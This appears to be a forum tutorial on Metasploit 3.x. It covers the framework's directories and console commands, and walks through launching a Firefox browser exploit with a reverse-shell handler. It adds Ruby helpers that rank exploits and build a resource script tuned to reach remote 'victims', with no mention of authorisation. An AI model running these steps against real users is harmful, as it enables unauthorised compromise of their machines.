Metasploit is a hacking framework made up of tools, exploits, payloads and the knowledge behind them. It is a boon to pen-testers, exploit developers and hackers. The project was started by H.D. Moore and is now an open source project managed by Rapid7; download and installation instructions are on the Metasploit site. I will use my Ubuntu 10.10 OS for code samples, so some commands may differ on other OS versions. If you have queries or questions please don't hesitate to post them in the comments below.

The directory structure

Metasploit has a very self-explanatory and user-friendly directory structure. On Linux the 3.x installer puts it under /opt/metasploit3:

Code:
    aneesh@aneesh-laptop:~$ cd /opt/metasploit3/
    aneesh@aneesh-laptop:/opt/metasploit3$

Let's see the different directories:

Code:
    aneesh@aneesh-laptop:/opt/metasploit3$ ls
    app  bin  env.sh  lib  msf3  run.sh
    aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls
    armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools
    data           lib      msfd        msfmachscan  msfrpc     README
    documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts
    external       msfcli   msfencode   msfpayload   msfupdate  test
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$

The data directory: contains the data files the modules rely on, such as PHP sources, wordlists, the Meterpreter DLLs and templates:
Code:
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls
    armitage             isight.bundle            passivex   vncdll.dll
    eicar.com            java                     php        vncdll.x64.dll
    eicar.txt            lab                      post       wmap
    emailer_config.yaml  meterpreter              snmp       wordlists
    exploits             msfcrawler               sounds
    gui                  msflinker_linux_x86.bin  sql
    ipwn                 msfpescan                templates

The lib directory: the name is pretty self-explanatory; it holds the Ruby libraries (the framework core) that every module and interface is built on.

The directory of greatest use to us is the modules directory:

Code:
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls
    auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$

The exploits dir: contains the exploit modules, organised by platform (windows, linux, multi, ...) and then by the kind of target (browser, smb, http, ...).
The encoders dir: contains the encoders that rewrite a payload so that it avoids bytes the target will not accept (null bytes, for instance) and simple signature matching. They encode payloads, not pages or programs in general.
The auxiliary dir: contains modules that do not deliver a payload: scanners, sniffers, fuzzers, DoS tools and the like.
The payloads and nops dirs: payloads provide the code that runs on the target after a successful exploit (command shells, Meterpreter, ...); nops provide the NOP generators used to pad shellcode.
The post dir: post-exploitation modules that run inside a session you already have.

Getting to know Metasploit

The first thing to pick is an interface. The four main types are:

msfweb (the web interface)
msfgui (the graphical user interface)
msfconsole (the console interface)
msfcli (the command line interface)

Note that only msfconsole, msfcli and msfgui appear in the msf3 listing above. The most powerful and most used interface is the console, so we'll be using it throughout this tutorial.
To open Metasploit just type 'msfconsole' in your shell and you should get an output similar to this:

Code:
    aneesh@aneesh-laptop:~$ msfconsole

                                    _
                                    | |      o
      _  _  _    _ _|_  __,   ,   _ | |  __    _|_
     / |/ |/ |  |/  |  /  |  / \_|/ \_|/ /  \_|  |
       |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                                /|
                                \|

           =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
    + -- --=[ 643 exploits - 328 auxiliary
    + -- --=[ 216 payloads - 27 encoders - 8 nops
           =[ svn r11647 updated today (2011.01.26)

    msf >

Now that we know how to open Metasploit let's look at some of its modules. We use several commands for it:

The show command. Syntax: show all (lists every loaded module; show exploits, show auxiliary and show payloads list one type at a time)
The search command. Syntax: search (pattern), which matches the pattern against the loaded modules

For example, let's search for Firefox exploits and see what is in store for us:

Code:
    msf > search firefox
    [*] Searching loaded modules for pattern 'firefox'...

    Exploits
    ========

       Name                                             Disclosure Date  Rank       Description
       ----                                             ---------------  ----       -----------
       multi/browser/firefox_escape_retval              2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption
       multi/browser/firefox_queryinterface             2006-02-02       normal     Firefox location.QueryInterface() Code Execution
       multi/browser/mozilla_compareto                  2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
       multi/browser/mozilla_navigatorjava              2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
       windows/browser/apple_quicktime_rtsp             2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
       windows/browser/awingsoft_winds3d_sceneurl       2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
       windows/browser/dxstudio_player_exec             2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
       windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

    msf >

You will notice that most of the hits are browser exploits, and that not all of them are bugs in Firefox itself (QuickTime, Winds3D and the Windows ANI handler are in the list too), so read each description before picking one. The Rank column (normal, great, excellent) is Metasploit's estimate of how reliably a module works and is a good first filter when several hits look plausible. This is the power of Metasploit!
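As an added example (this is not code from the tutorial or from Metasploit itself), here is a small Ruby script that parses the table printed by 'search' into records and orders them by rank, so the most reliable module comes first. The rank order follows Metasploit's ranking levels, the sample input is the 'search firefox' output shown above embedded as a string, and the helper names are my own.

```ruby
# Added example (not part of the original tutorial or of Metasploit itself):
# parse the table printed by `msf > search <pattern>` into records and sort the
# hits by Metasploit's module rank, so the most reliable exploit comes first.
# The rank names and their order follow Metasploit's ranking constants
# (Manual < Low < Average < Normal < Good < Great < Excellent).

RANK_ORDER = %w[manual low average normal good great excellent].freeze

# One row of the table. disclosure_date is nil for modules that have none.
SearchHit = Struct.new(:name, :disclosure_date, :rank, :description)

# A module row looks like (columns separated by runs of spaces):
#   multi/browser/firefox_escape_retval  2006-07-14  normal  Firefox 3.5 escape() ...
# The date column is optional, so it is an optional group, and the rank keyword
# anchors the split between the fixed columns and the free-text description.
ROW_RE = /\A(\S+)\s+(?:(\d{4}-\d{2}-\d{2})\s+)?(#{RANK_ORDER.join('|')})\s+(.+)\z/

def parse_search_output(text)
  text.each_line.map do |raw|
    line = raw.strip
    # Skip the prompt, the "[*] Searching..." banner, section titles such as
    # "Exploits", the "====" / "----" rulers and the column header row.
    next if line.empty? || line.start_with?('[*]', 'Name', '----', '====')
    next if line.match?(/\A[A-Za-z]+\z/)
    m = ROW_RE.match(line)
    m && SearchHit.new(m[1], m[2], m[3], m[4])
  end.compact
end

# Highest rank first; rows of equal rank keep the order Metasploit printed them in.
def sort_by_rank(hits)
  hits.each_with_index
      .sort_by { |hit, idx| [-RANK_ORDER.index(hit.rank), idx] }
      .map(&:first)
end

# The hits at or above min_rank, best first.
def best_hits(text, min_rank: 'great')
  floor = RANK_ORDER.index(min_rank)
  raise ArgumentError, "unknown rank #{min_rank}" unless floor
  sort_by_rank(parse_search_output(text)).select { |h| RANK_ORDER.index(h.rank) >= floor }
end

# Constructed sample: the output of `search firefox` shown in the tutorial above.
SAMPLE_SEARCH_OUTPUT = <<~OUT
  msf > search firefox
  [*] Searching loaded modules for pattern 'firefox'...

  Exploits
  ========

     Name                                             Disclosure Date  Rank       Description
     ----                                             ---------------  ----       -----------
     multi/browser/firefox_escape_retval              2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption
     multi/browser/firefox_queryinterface             2006-02-02       normal     Firefox location.QueryInterface() Code Execution
     multi/browser/mozilla_compareto                  2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
     multi/browser/mozilla_navigatorjava              2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
     windows/browser/apple_quicktime_rtsp             2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
     windows/browser/awingsoft_winds3d_sceneurl       2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
     windows/browser/dxstudio_player_exec             2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
     windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

  msf >
OUT

if __FILE__ == $PROGRAM_NAME
  best_hits(SAMPLE_SEARCH_OUTPUT).each { |h| puts "#{h.rank.ljust(9)} #{h.name}" }
end
```

Run it as a script and it prints the two excellent-ranked modules followed by the great-ranked one; lower the min_rank argument to 'normal' to get all eight rows back in rank order.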
Let's use the 'use' command to select an exploit. Syntax:

Code:
    use (path)

Output:

Code:
    msf > use exploit/multi/browser/firefox_escape_retval
    msf exploit(firefox_escape_retval) >

Now let's see the options:

Code:
    show options

Output:

Code:
    msf exploit(firefox_escape_retval) > show options

    Module options (exploit/multi/browser/firefox_escape_retval):

       Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       SRVHOST     0.0.0.0          yes       The local host to listen on.
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming connections
       SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH                      no        The URI to use for this exploit (default is random)

    Exploit target:

       Id  Name
       --  ----
       0   Firefox 3.5.0 on Windows XP SP0-SP3

Note the exploit target: this module is written for Firefox 3.5.0 on Windows XP, so it will only work against a victim running that combination.

Let us now set the options. This is done with:

Code:
    set (option name) (value)

Now let's set some options according to our needs:

Code:
    msf exploit(firefox_escape_retval) > set SRVHOST localhost
    SRVHOST => localhost
    msf exploit(firefox_escape_retval) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(firefox_escape_retval) > set URIPATH /exploit
    URIPATH => /exploit

Explanations:

'set SRVHOST localhost' sets the address on which the exploit's web server listens. localhost is the loopback interface, which is fine for testing with a browser on the same machine, but a victim on another host cannot connect to it: for a real target set SRVHOST to an address the victim can reach, or keep the default 0.0.0.0, which listens on every interface.
'set SRVPORT 80' sets the port the server listens on. Port 80 is the default for web servers, so the victim's URL needs no port number; it is a privileged port, though, so msfconsole must be running as root to bind it (the default, 8080, needs no special rights).
'set URIPATH /exploit' sets the path of the exploit page (the default is a random string). Together these mean we have to get the victim to open http://localhost/exploit for the exploit to fire.

Now that the options are set, let's run the exploit:

Code:
    exploit

Output:

Code:
    msf exploit(firefox_escape_retval) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 10.10.2.35:4444
    [*] Using URL: http://localhost:80/exploit
    [*] Server started.

The 'Started reverse handler' line comes from the payload, which we never set explicitly: the module's default payload connects back to our machine (LHOST, detected here as 10.10.2.35) on port 4444 (LPORT). Use 'show payloads' to list the payloads compatible with this exploit, and 'set PAYLOAD', 'set LHOST' and 'set LPORT' to change them.
So the output tells us the exploit server is up and the handler is waiting. From here the work gets a lot easier: we just have to get a user with the vulnerable browser to open the link. When the exploit succeeds the payload connects back to the handler and a session opens; 'sessions -l' lists the open sessions and 'sessions -i <id>' interacts with one. I hope this is enough to get you started working with Metasploit.
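The use / set / exploit sequence above is usually saved as a resource script so it can be replayed with 'msfconsole -r file.rc'. As an added example (not code from the tutorial or from Metasploit), here is a Ruby script that generates such a resource file and checks the server options first, flagging the two settings from the walkthrough that would stop a remote victim ever reaching the exploit page: SRVHOST bound to loopback and a privileged SRVPORT. The helper names are my own; the option values come from the tutorial, and 10.10.2.35 is the attacker address the reverse handler bound to in the output above.

```ruby
# Added example (not part of the original tutorial or of Metasploit itself):
# generate a msfconsole resource script for a browser exploit and sanity-check
# the server options before the listener is started. The checks cover the two
# settings that most often break a browser-exploit setup: SRVHOST bound to an
# address the victim cannot reach, and a privileged SRVPORT that msfconsole
# cannot bind unless it runs as root. Run the result with `msfconsole -r file.rc`.
require 'ipaddr'

LOOPBACK_NAMES = %w[localhost 127.0.0.1 ::1].freeze

# True for any loopback IP address; false for hostnames and non-loopback IPs.
def loopback_ip?(host)
  IPAddr.new(host).loopback?
rescue IPAddr::InvalidAddressError
  false
end

# Returns a list of warnings about SRVHOST / SRVPORT / URIPATH; empty when the
# options look usable against a victim on another machine.
def check_server_options(opts)
  opts = opts.transform_keys(&:to_s)
  host = opts.fetch('SRVHOST')
  port = Integer(opts.fetch('SRVPORT'))
  uri  = opts.fetch('URIPATH', '').to_s
  warnings = []

  if LOOPBACK_NAMES.include?(host) || loopback_ip?(host)
    warnings << "SRVHOST #{host} is loopback: only a browser on this machine " \
                "can reach http://#{host}:#{port}#{uri}"
  end
  warnings << "SRVPORT #{port} is privileged: msfconsole must run as root to bind it" if port < 1024
  warnings << "URIPATH #{uri} should start with '/'" if !uri.empty? && !uri.start_with?('/')
  warnings
end

# Render the same use / set / exploit sequence that was typed interactively.
# `exploit -j` starts the server as a background job, which is what the
# interactive `exploit` did ("Exploit running as background job").
def resource_script(module_path, opts)
  lines = ["use #{module_path}"]
  opts.each { |name, value| lines << "set #{name} #{value}" }
  lines << 'exploit -j'
  lines.join("\n") + "\n"
end

# Constructed sample: the options the tutorial set, and a version with SRVHOST
# pointed at the attacker address the reverse handler bound to (10.10.2.35) and
# the unprivileged default port.
TUTORIAL_OPTS = { 'SRVHOST' => 'localhost', 'SRVPORT' => 80, 'URIPATH' => '/exploit' }.freeze
REMOTE_OPTS   = { 'SRVHOST' => '10.10.2.35', 'SRVPORT' => 8080, 'URIPATH' => '/exploit' }.freeze

if __FILE__ == $PROGRAM_NAME
  check_server_options(TUTORIAL_OPTS).each { |w| warn "warning: #{w}" }
  print resource_script('exploit/multi/browser/firefox_escape_retval', REMOTE_OPTS)
end
```

Run as a script it prints two warnings for the tutorial's settings and then the resource file for the remote-usable settings; redirect the output to a .rc file and hand it to msfconsole -r. The payload options (PAYLOAD, LHOST, LPORT) are left at the module defaults exactly as the walkthrough did; add them to the options hash to set them explicitly.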
Thanks Shabbir for accepting my articles and making them much better with the edits. Thanks a ton!